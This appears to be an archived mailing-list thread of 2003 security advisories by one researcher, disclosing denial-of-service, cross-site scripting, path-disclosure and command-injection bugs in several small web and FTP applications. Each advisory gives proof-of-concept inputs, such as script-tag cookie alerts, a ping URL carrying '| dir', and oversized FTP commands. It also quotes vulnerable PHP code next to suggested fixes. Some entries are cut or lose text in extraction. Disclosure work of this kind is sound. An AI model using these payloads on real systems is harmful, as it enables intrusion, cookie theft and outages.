[SCSA-014] Remote Denial of Service Vulnerability in EZ Server

2003-03-31 Thread Grégory


==
Security Corporation Security Advisory [SCSA-014]

Remote Denial of Service Vulnerability in EZ Server
==

PROGRAM: EZ Server 
HOMEPAGE: http://www.html-helper.com
VULNERABLE VERSIONS: 1.0 and prior ?
RISK: Medium/High
IMPACT: Denial Of Service
RELEASE DATE: 2003-03-31

==
TABLE OF CONTENTS
==

1..DESCRIPTION
2..DETAILS
3..EXPLOIT
4SOLUTIONS
5VENDOR STATUS
6..CREDITS
7...DISCLAIMER
8...REFERENCES 
9.FEEDBACK

1. DESCRIPTION
==

EZ Server is a compact multi-threaded server has both HTTP and FTP
built right into it. (direct quote from http://www.html-helper.com)  

 
2. DETAILS
==

¤ Remote DoS :

A security vulnerability in EZ FTP server allows remote attackers to
cause the server to crash by executing a specific command (ls and cd 
command) with a buffer of 1994 or 1995 bytes in length or more.

The command can be issued to the FTP server either by a valid 
authenticated user or by the anonymous account (if this is enabled). 


3. EXPLOIT
==

The following is an example of what should be done to accomplish the 
Denial of Service attack:

- With the ls command :

C:\ftp target
Connected to target.
220 EZ FTP Server ready.
User (target:(none)):  anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp ls AAA





































AAA


- With the cd command :

C:\ftp target
Connected to target.
220 EZ FTP Server ready.
User (target:(none)):  anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp cd AAA









Re: [SCSA-011] Path Disclosure Vulnerability in XOOPS

2003-03-28 Thread Grégory
In-Reply-To: [EMAIL PROTECTED]

You can fix the path disclosure problem by adding this code in all the 
affected files :

---snip---
error_reporting(0); 
---snip---

Greetz : Magistrat (http://www.blocus-zone.com)




From: Grégory Le Bras [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: [SCSA-011] Path Disclosure Vulnerability in XOOPS





Security Corporation Security Advisory [SCSA-011]


PROGRAM: XOOPS
HOMEPAGE: http://www.xoops.org/
VULNERABLE VERSIONS: v2.0 (and prior ?)


DESCRIPTION


XOOPS is a dynamic OO (Object Oriented) based open source portal script
written in PHP. XOOPS is the ideal tool for developing small to large
dynamic community websites,intra company portals, corporate portals,
weblogs and much more. (direct quote from XOOPS website)


DETAILS  EXPLOITS


¤ Details Path Disclosure :

A vulnerability have been found in XOOPS which allow attackers to 
determine
the physical path of the application.

This vulnerability would allow a remote user to determine the full path to
the web root directory and other potentially sensitive information.
This vulnerability can be triggered by a remote user submitting a
specially crafted HTTP request including invalid input to the
$xoopsOption variable.

¤ Exploits Path Disclosure :

http://[target]/index.php?xoopsOption=any_word

Affected files:
admin.php
edituser.php
footer.php
header.php
image.php
lostpass.php
pmlite.php
readpmsg.php
register.php
search.php
user.php
userinfo.php
viewpmsg.php
class/xoopsblock.php
modules/contact/index.php
modules/mydownloads/index.php
modules/mydownloads/brokenfile.php
modules/mydownloads/modfile.php
modules/mydownloads/ratefile.php
modules/mydownloads/singlefile.php
modules/mydownloads/submit.php
modules/mydownloads/topten.php
modules/mydownloads/viewcat.php
modules/mylinks/brokenlink.php
modules/mylinks/index.php
modules/mylinks/modlink.php
modules/mylinks/ratelink.php
modules/mylinks/singlelink.php
modules/mylinks/submit.php
modules/mylinks/topten.php
modules/mylinks/viewcat.php
modules/newbb/index.php
modules/newbb/search.php
modules/newbb/viewforum.php
modules/newbb/viewtopic.php
modules/news/archive.php
modules/news/article.php
modules/news/index.php
modules/sections/index.php
modules/system/admin.php
modules/xoopsfaq/index.php
modules/xoopsheadlines/index.php
modules/xoopsmembers/index.php
modules/xoopspartners/index.php
modules/xoopspartners/join.php
modules/xoopspoll/index.php
modules/xoopspoll/pollresults.php

SOLUTIONS


No solution for the moment.


VENDOR STATUS


The vendor has reportedly been notified.


LINKS


Version Française :
http://www.security-corporation.com/index.php?id=advisoriesa=011-FR



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com




[SCSA-013] Cross Site Scripting vulnerability in testcgi.exe

2003-03-27 Thread Grégory




Security Corporation Security Advisory [SCSA-013]


PROGRAM: Ceilidh
HOMEPAGE: http://www.lilikoi.com
VULNERABLE VERSIONS: 2.70 and prior



DESCRIPTION


Ceilidh is a Web-based threaded discussion engine that features 
automatic text to HTML conversion, file attachment, e-mail 
notification, automatic message expiration, multiple levels of 
security and much more.
(direct quote from http://www.lilikoi.com) 


DETAILS  EXPLOITS


¤ Cross Site Scripting :

A exploitable bug was found on Ceilidh which cause script
execution on client's computer by following a crafted url.

This kind of attack known as Cross-Site Scripting Vulnerability is 
present in testcgi.exe file, an attacker can input specially crafted 
links and/or other malicious scripts.

- Exploits : 

http://[target]/cgi-bin/testcgi.exe?[hostile_code]

The hostile code could be :

[script]alert(Cookie=+document.cookie)[/script]

(open a window with the cookie of the visitor.)

(replace [] by )


SOLUTIONS


No solution for the moment.


VENDOR STATUS 


The vendor has reportedly been notified.


LINKS


- http://www.security-corp.org/index.php?ink=4-15-1

- Version Française :
http://www.security-corporation.com/index.php?id=advisoriesa=013-FR



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com





[SCSA-011] Path Disclosure Vulnerability in XOOPS

2003-03-20 Thread Grégory




Security Corporation Security Advisory [SCSA-011]


PROGRAM: XOOPS
HOMEPAGE: http://www.xoops.org/
VULNERABLE VERSIONS: v2.0 (and prior ?)


DESCRIPTION


XOOPS is a dynamic OO (Object Oriented) based open source portal script
written in PHP. XOOPS is the ideal tool for developing small to large
dynamic community websites,intra company portals, corporate portals,
weblogs and much more. (direct quote from XOOPS website)


DETAILS  EXPLOITS


¤ Details Path Disclosure :

A vulnerability have been found in XOOPS which allow attackers to determine
the physical path of the application.

This vulnerability would allow a remote user to determine the full path to
the web root directory and other potentially sensitive information.
This vulnerability can be triggered by a remote user submitting a
specially crafted HTTP request including invalid input to the
$xoopsOption variable.

¤ Exploits Path Disclosure :

http://[target]/index.php?xoopsOption=any_word

Affected files:
admin.php
edituser.php
footer.php
header.php
image.php
lostpass.php
pmlite.php
readpmsg.php
register.php
search.php
user.php
userinfo.php
viewpmsg.php
class/xoopsblock.php
modules/contact/index.php
modules/mydownloads/index.php
modules/mydownloads/brokenfile.php
modules/mydownloads/modfile.php
modules/mydownloads/ratefile.php
modules/mydownloads/singlefile.php
modules/mydownloads/submit.php
modules/mydownloads/topten.php
modules/mydownloads/viewcat.php
modules/mylinks/brokenlink.php
modules/mylinks/index.php
modules/mylinks/modlink.php
modules/mylinks/ratelink.php
modules/mylinks/singlelink.php
modules/mylinks/submit.php
modules/mylinks/topten.php
modules/mylinks/viewcat.php
modules/newbb/index.php
modules/newbb/search.php
modules/newbb/viewforum.php
modules/newbb/viewtopic.php
modules/news/archive.php
modules/news/article.php
modules/news/index.php
modules/sections/index.php
modules/system/admin.php
modules/xoopsfaq/index.php
modules/xoopsheadlines/index.php
modules/xoopsmembers/index.php
modules/xoopspartners/index.php
modules/xoopspartners/join.php
modules/xoopspoll/index.php
modules/xoopspoll/pollresults.php

SOLUTIONS


No solution for the moment.


VENDOR STATUS


The vendor has reportedly been notified.


LINKS


Version Française :
http://www.security-corporation.com/index.php?id=advisoriesa=011-FR



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com



[SCSA-010] Path Disclosure Cross Site Scripting Vulnerability in MyABraCaDaWeb

2003-03-17 Thread Grégory
,!document.cookie!,$ma_kw);
$ma_kw = eregi_replace(vbscript,!vbscript!,$ma_kw);
$ma_kw = eregi_replace(location,!location!,$ma_kw);
$ma_kw = eregi_replace(object,!object!,$ma_kw);
$ma_kw = eregi_replace(vbs,!vbs!,$ma_kw);
$ma_kw = eregi_replace(href,!href!,$ma_kw);
$vtp_p = new VTemplate;
$tpl_p = $vtp_p-Open(modules/pertinance/tpl/rapport.tpl);
$vtp_p-addSession($tpl_p,rapport);
$vtp_p-setVar($tpl_p,rapport.ma_kw,$ma_kw);
$vtp_p-setVar($tpl_p,rapport.NbMotCle,$NbMotCle);
$vtp_p-setVar($tpl_p,rapport.T3,$T3);
$vtp_p-setVar($tpl_p,rapport.NbLiens,$NbLiens);
if(quel_groupe() == 4){
$sql = htmlentities($sql);
$sql = addslashes($sql);
$vtp_p-addSession($tpl_p,sql);
$vtp_p-setVar($tpl_p,sql.sql,$sql);
$vtp_p-closeSession($tpl_p,sql);
}
$vtp_p-closeSession($tpl_p,rapport);
$Raport = $vtp_p-Display($tpl_p,0);



VENDOR STATUS


The vendor has reportedly been notified. It currently develops a patch.


LINKS


http://www.security-corporation.com/index.php?id=advisoriesa=010

http://www.security-corp.org/index.php?ink=4-15-1

-
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
-


[SCSA-009] Remote Command Execution Vulnerability in PHP Ping

2003-03-06 Thread Grégory




Security Corporation Security Advisory [SCSA-009]


PROGRAM: PHP Ping
HOMEPAGE: http://www.phpapps.org/
VULNERABLE VERSIONS: v0.1 and prior
 

DESCRIPTION


PHP ping will allow you, provided that your server turns under Windows, 
to realize a ping on the host of your choice.

(direct quote from PHP Ping website)


DETAILS


A vulnerability have been found in PHP ping which allow attackers to 
execute remote command.

This vulnerability would allow a remote attacker to compromise parts of 
the operating system, possibly the complete operating system.

Vulnerable code :

?
//*
// FONCTION DU PING
//*
function PHPing($cible,$pingFile){
exec(ping -a -n 1 $cible $pingFile, $list); 
$fd = fopen($pingFile, r);
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
//-
?


EXPLOIT


The vulnerability was discovered in the page for execute ping, 
at this adress : 

http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir

This exploit simply show the contents of the current repertory.

c:\phpping

03/03/2003  23:01   DIR  .
03/03/2003  23:01   DIR  ..
03/03/2003  23:00   DIR  img
30/04/2002  23:133217 index.php
30/04/2002  23:19  921 README
03/03/2003  23:030 resultat.ping
   3 file(s)4138 bytes
   3 Dir(s)  11413962752 bytes free


SOLUTIONS


For example use this code :

?
//*
// FONCTION DU PING
//*
function PHPing($cible,$pingFile){

# BugFix by Gregory LEBRAS www.security-corp.org

if( (!$cible) ||
(!preg_match(/^[\w\d\.\-]+\.[\w\d]{1,3}$/i,$cible)) ){
  echo(Error: Please specify a valid target host or IP.);
  exit;
}
else
{
exec(ping -a -n 1 $cible $pingFile, $list); 
$fd = fopen($pingFile, r);
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
}
//


VENDOR STATUS 


The vendor has reportedly been notified.


LINKS


Version Française : 

http://www.security-corp.org/advisories/SCSA-009-FR.txt



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org



[SCSA-008] Cross Site Scripting Script Injection Vulnerability in PY-Livredor

2003-03-03 Thread Grégory




Security Corporation Security Advisory [SCSA-008]


PROGRAM: PY-Livredor
HOMEPAGE: http://www.py-scripts.com
   http://www.scripts-php.com
VULNERABLE VERSIONS: v1.0


DESCRIPTION


PY-Livredor is an easy guestbook script using Php4 and MySql with
an administration which allow messages deletion.


DETAILS


A Cross-Site Scripting vulnerability have been found in PY-Livredor
which allow attackers to inject script codes into the guestbook and use
them on clients browser as if they were provided by the website.

This Cross-Site Scripting vulnerability are found in the page for
posting messages (index.php)

An attacker can input specially crafted links and/or other
malicious scripts.


EXPLOIT


A vulnerability was discovered in the page for posting messages,
at this adress :

http://[target]/livredor/index.php


The vulnerability is at the level of the interpretation of the titre,
Votre pseudo, Votre e-mail, Votre message fields.

Indeed, the insertion of a hostile code script in this field makes it
possible to a malicious user to carry out this script on the navigator
of the visitors.


The hostile code could be :

[script]alert(Cookie=+document.cookie)[/script]

(open a window with the cookie of the visitor.)

(replace [] by )


SOLUTIONS


No solution for the moment.


VENDOR STATUS


The vendor has reportedly been notified.


LINKS


http://www.security-corp.org/index.php?ink=4-15-1

Version Française :

http://www.security-corp.org/advisories/SCSA-008-FR.txt



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org




[SCSA-006] XSS Function Execution Vulnerabilities in Nuked-Klan

2003-02-23 Thread Grégory




Security Corporation Security Advisory [SCSA-006]


PROGRAM: Nuked-Klan
HOMEPAGE: http://www.nuked-klan.org
VULNERABLE VERSIONS: beta 1.3
 


DESCRIPTION


Nuked Klan is a PHP Gateway for clans.

(direct quote from Nuked Klan website)


DETAILS  EXPLOITS


Many Cross-Site Scripting vulnerabilities have been found in Nuked Klan 
which allow attackers to inject script codes into the page and use them 
on clients browser as if they were provided by the site.

These Cross-Site Scripting vulnerabilities are found in the following 
modules : Team, News, Links(Liens). 

An attacker can input specially crafted links and/or other 
malicious scripts.

Moreover this vulnerability allows an attacker to reach certain 
functions of php.



Team


A vulnerability was discovered at this adress : 

XSS:


http://[target]/index.php?file=Teamop=lt;scriptgt;alert('Test');lt;/scriptgt;


Function Execution:
---

http://[target]/index.php?file=Teamop=phpinfo

(display phpinfo(); - Outputs lots of PHP information)


News



A vulnerability was discovered at this adress : 

XSS:


http://[target]/index.php?file=Newsop=lt;scriptgt;alert('test');lt;/scriptgt;


Function Execution:
---

http://[target]/index.php?file=Newsop=phpinfo

(display phpinfo(); - Outputs lots of PHP information)


Links


A vulnerability was discovered at this adress : 

XSS:


http://[target]/index.php?file=Liensop=lt;scriptgt;alert('test');lt;/scriptgt;


Function Execution:
---

http://[target]/index.php?file=Liensop=phpinfo

(display phpinfo(); - Outputs lots of PHP information)


SOLUTIONS


No solutions for the moment.


VENDOR STATUS 


The vendor has reportedly been notified. It currently develops a patch.


LINKS


http://www.security-corp.org/index.php?ink=4-15-1

Version Française : 

http://www.security-corp.org/advisories/SCSA-006-FR.txt



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org